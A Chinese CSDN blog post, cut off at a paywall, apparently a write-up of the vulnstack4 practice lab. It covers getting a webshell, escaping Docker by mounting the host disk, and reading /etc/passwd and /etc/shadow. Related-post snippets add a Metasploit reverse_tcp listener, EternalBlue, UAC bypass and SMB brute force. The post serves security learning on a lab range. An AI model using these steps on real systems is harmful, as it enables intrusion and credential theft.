靶场vulnstack4内网渗透

已于 2022-11-19 19:02:02 修改
阅读量1k 收藏 3
点赞数 1
分类专栏: 靶场 文章标签: 网络安全 web安全
于 2022-11-18 19:25:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71169068/article/details/127909503
版权

环境介绍:

服务器:192.168.183.129、192.168.10.232

win7:192.168.183.131

DC:192.168.183.130

kali:192.168.10.182

1.拿webshell

对ubuntu的IP进行端口扫描

访问ubuntu的ip:2002 或2001或2003

用AWVS对IP:2002扫描

 对其进行抓包,改包,重放

 

上传后访问的页面

 用蚁剑连接(最好用冰蝎)

2.逃溢docker

连接后打开终端执行ip addr

可以对比我们搭建的环境看到是在docker环境里

要拿到服务器权限就要跳出docker

把sda1挂到docker里

cd /tmp

mkdir test

mount /dev/sda1 test

现在test相当与宿主机的根目录了

执行cat test/etc/passwd

这个时候可以用ssh连接

也可以写入我们自己的账号密码进行连接

cat /etc/passwd

cat /etc/shad

最低0.47元/天 解锁文章
老六_小二郎
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnstack域环境靶场(四)
BROTHERYY的博客
12-09 1477
环境搭建 进入Ubuntu的web虚拟机,ubuntu为我们的web环境,其中的web环境需要手动开启,全部为docker环境,需要启动的环境分别为:s2-045、CVE-2017-12615、cve-2018-12613,启动方法如下: sudo su ubuntu docker-compose build docker-compose up 环境全部开启效果如下: 信息搜集 通过nmap发现主机开启以下服务,访问phpmyadmin属于未授权,直接就登录了 ...
渗透学习 webug4.0靶场
07-12
渗透学习 webug4.0靶场 渗透学习 webug4.0靶场 渗透学习 webug4.0靶场
渗透vulnstack靶场系列(一)
xf555er的博客
10-18 2034
Vulnstack靶场有两个默认用户, 分别是域成员和域管理员用户, 其默认密码均为首次登录会要求用户修改密码, 除此之外我还新添加了个用户用于登录win2003主机所有的用户信息如下表格所示:下图为卡的配置信息, 配置的子IP为, 设置为仅主机模式下图为NAT模式的卡配置信息, 配置的子IP为域控的络连接配置如下:Web服务器有两个卡, 其中一个卡是用于Web服务器与域内主机进行数据交互, 此卡需将DNS服务器地址设置成域控服务器地址, 其他域内成员的络配置亦是如此, 这里就不详细描述了
靶场复现系列--vulnstack 4
梦之旅行地
12-17 1753
一、前言 也不知道是我运气差还是怎么回事,用vmw搭靶场就是搭不起来,遇到各种问题,后来换成virtual box后解决几个问题就可以了。 第一个问题,虚拟机导入后卡最好重新配下,不然容易报卡的错误 第二个问题,启动docker报错,web服务器(ubuntu)用户未加入docker组,将ubuntu用户加入docker组后,重启就可以通过docker构建容器了,下面是加入docker组的命令 sudo gpasswd -a ${USER} docker 二、实践 1.拓扑 备注:这图片直接在靶场
红日靶机vulnstack04【半总结】
qq_45300786的博客
10-06 513
这次环境是3台机器, web服务器:000000 、DC:000000ydc. 、 win7 web服务器改ip有点麻烦,因为需要root用户才能改,给的ubuntu改不了。 所以我就进入高级模式下,修改了root用户的密码 关于虚拟机没有ipIP解决方案 然后再切到root用户修改ip win7 这台机器最麻烦,因为UAC开启最高模式,所以无论执行什么东西,都要输入账号密码 这里我的思路是先用msf的永恒之蓝拿到shell,然后再用下面这个链接去绕过UAC,提权为system权限。然后利用这个sy
Vulnstack红日安全内渗透靶场1实战
热门推荐
道阻且长,行则将至。
07-14 1万+
文章目录前言靶场搭建外打点MySQL写日志GetshellCMS后台上传GetShell内渗透靶机CS后门上线内域信息的收集 前言 VulnStack 是由红日安全团队倾力打造一个靶场知识平台。为了进一步学习内渗透,本文将学习并记录红日安全团队提供的一个内域环境靶场渗透过程。 靶场搭建 在线 靶场链接 如下: 1、下载后为 3 个虚拟机,络拓扑如下: 2、从络拓扑图得知,需要模拟内和外两个段, Win7 虚拟机相当于关服务器,所以需要两张卡,故需要配置两个络适配器(卡),点击
渗透之常见命令
03-14
渗透之常见命令,详细列数了渗透的过程中所用到的所有技术,命令
web渗透教程1:pikachu靶场搭建
11-17
带你手把手搭建pikachu靶场环境
渗透测试,靶场,模拟搭建渗透测试真实环境,搭建靶场详细流程即相关包.zip
12-05
内容:详细的渗透测试靶场搭建包,以及详细搭建流程,提供了靶场所有环境,比如sql注入,木马,获权等模拟真实环境 适用于:需要学习渗透测试相关知识,但是没有搭建好模拟真实环境的靶场人群下载以及使用,同时针对...
WEB渗透学习-XSS-labs靶场
04-20
4. **XSS过滤与绕过**:靶场会设置一些过滤机制,防止恶意脚本执行。学习者需要了解常见的过滤规则,如HTML实体编码、JavaScript事件禁用等,并尝试绕过这些防护措施。 5. **XSS防御策略**:除了攻击,XSS-labs也会...
fscan64.exe
09-10
fscan64
billu-b0x靶场渗透
11-14
billu-b0x靶场渗透
Web漏洞渗透测试靶场(请勿在生产环境搭建)
最新发布
06-28
【作品名称】:Web漏洞渗透测试靶场 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目介绍】: Web漏洞渗透测试靶场 安装方法...
Web漏洞渗透测试靶场.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
php自查无后门靶场源码,渗透测试源码一套
03-22
【PHP自查无后门靶场源码与渗透测试详解】 在络安全领域,渗透测试是确保站和应用程序安全性的重要环节。PHP作为广泛应用的服务器端脚本语言,其安全问题备受关注。"php自查无后门靶场源码"是用于安全专业人士...
vulnstack4
m0_70782241的博客
02-23 1274
docker逃逸,域渗透
Vulnstack(四)
干铮的博客
05-24 1042
靶场拓扑 下载连接:http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ 用的是VMware workstation 所以可能出现一些错误 Docker环境启动的是Vulhub的在线三个靶机 1.信息收集 主机发现 sudo netdiscover -i eth1 -r 192.168.157.0/24 端口扫描 nmap -A 192.168.53.128 -p- -oN nmap.a 2.apacheput文件上传脚本..
红日(vulnstack)3 内渗透ATT&CK实战
m0_66299232的博客
03-11 1694
蚁剑成功连接后无法执行命令,disable_functions插件,权限提升-脏牛漏洞,用msfvenom生成木马文件,msf开启监听,执行木马文件,成功反弹shell到msf上 use exploit/multi/handler set payload linux/x64/meterpreter/reverse_tcp set LHOST 192.168.1.106 set LPORT 1106 run 使用use auxiliary/scanner/smb/smb_login模块,进行smb爆破
vulnstack4靶场笔记
orange777
02-05 2123
0x01 实验环境 目标端 ubuntu IP1: 192.168.157.128 IP2: 192.168.183.128 ubuntu:ubuntu win7 IP: 192.168.183.129 douser:Dotest123 DC IP: 192.168.183.130 administrator:Test2008 攻击端 windows7 192.168.157.129 kali 192.168.157.130 0x01 渗透测试 首先需要进入ubuntu开启服务,
红日安全ATT&CK靶机实战系列之vulnstack4
黑白的博客
04-25 8150
声明 好好学习,天天向上 环境配置 下载地址,直接进去用百度云,没有会员也下的非常快 http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ 边下载着,可以开始vmware的络配置 有两个段,外段是我自己设置的桥接模式192.168.31.1/24,内段,vmware加一个卡VMnet3,192.168.183.1/24 和前面的大同小异,我这里就不细说了看过系列文章的应该都已经很清楚这种络结构了,我直接贴图吧 桥接的就是攻击机与边界服务器的
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值